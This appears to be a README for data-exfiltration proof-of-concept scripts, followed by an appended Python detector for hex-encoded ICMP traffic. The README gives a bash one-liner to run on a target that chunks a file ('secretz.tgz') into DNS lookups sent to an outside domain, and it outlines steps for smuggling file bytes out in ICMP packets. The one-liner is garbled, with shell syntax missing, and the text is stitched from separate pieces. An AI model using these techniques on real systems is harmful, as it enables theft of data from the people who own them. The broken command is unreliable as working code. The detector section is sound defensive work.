Data Exfiltration PoC Scripts
September 11, 2015
DNS Exfiltration (dns_catch.py)
Run dns_catch.py on your DNS server.
On the target system, execute via bash:
file="secretz.tgz"; key="moo"; domain="sensepost.com" i=1; md=file| md5sum| cut -d " " -f 1); len=file |wc -l)); for h in cat h.0.len.domain; i=i+1));done; host i.key.$domain
ICMP (icmp_shover.py)
Sending:
- Read n bytes of file
- Convert to hex
- Create ICMP() packet with destination / source headers
- Pack ICMP() data section with the hex
- Drop it onto the wire!
Receiving:
- Listen on network interface for ICMP packets (with a little signature)
- Unpack from data and write to file
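The ICMP flow described above has a recognisable shape on the wire: echo requests whose data section is almost entirely ASCII hex and differs on every packet. The following detector for that pattern is an added example, not code from this repository. The function names, thresholds, sample addresses and the "XX" marker standing in for the unspecified signature are assumptions.

```python
import string
import struct
from collections import defaultdict

HEX = set(string.hexdigits.encode())   # byte values of 0-9, a-f, A-F

def parse_icmp(raw):
    """Split a raw ICMP message into (type, code, payload); None if truncated."""
    if len(raw) < 8:
        return None
    icmp_type, code, _csum, _ident, _seq = struct.unpack("!BBHHH", raw[:8])
    return icmp_type, code, raw[8:]

def hex_digits(payload):
    """Number of payload bytes that are ASCII hex digits."""
    return sum(b in HEX for b in payload)

def suspicious_flows(packets, min_packets=3, min_ratio=0.9):
    """packets: iterable of (src, dst, raw_icmp). Returns {(src, dst): stats} for
    flows whose echo requests carry varying, mostly-hex payloads."""
    flows = defaultdict(lambda: {"packets": 0, "payloads": set(), "digits": 0})
    for src, dst, raw in packets:
        parsed = parse_icmp(raw)
        if parsed is None or parsed[0] != 8:       # 8 = echo request
            continue
        payload = parsed[2]
        n = hex_digits(payload)
        if payload and n / len(payload) >= min_ratio:
            f = flows[(src, dst)]
            f["packets"] += 1
            f["payloads"].add(payload)
            f["digits"] += n
    # An ordinary ping repeats one payload; encoded file chunks differ per packet.
    return {flow: {"packets": f["packets"], "est_bytes": f["digits"] // 2}
            for flow, f in flows.items()
            if f["packets"] >= min_packets and len(f["payloads"]) >= min_packets}

def echo(seq, payload):
    """Build a constructed echo request (checksum left at 0 for the sample)."""
    return struct.pack("!BBHHH", 8, 0, 0, 0x1234, seq) + payload

# Constructed sample traffic: one ordinary ping flow, one flow with hex chunks.
SAMPLE = [("10.0.0.5", "10.0.0.1", echo(i, b"abcdefghijklmnopqrstuvwabcdefghi"))
          for i in range(4)]
SAMPLE += [("10.0.0.9", "203.0.113.7", echo(i, b"XX" + chunk.hex().encode()))
           for i, chunk in enumerate([b"secret-part-one!", b"secret-part-two!",
                                      b"secret-part-3333", b"secret-part-4444"])]

if __name__ == "__main__":
    print(suspicious_flows(SAMPLE))
```

The ratio threshold, rather than an all-hex test, keeps the match when a short non-hex marker is prepended to each chunk.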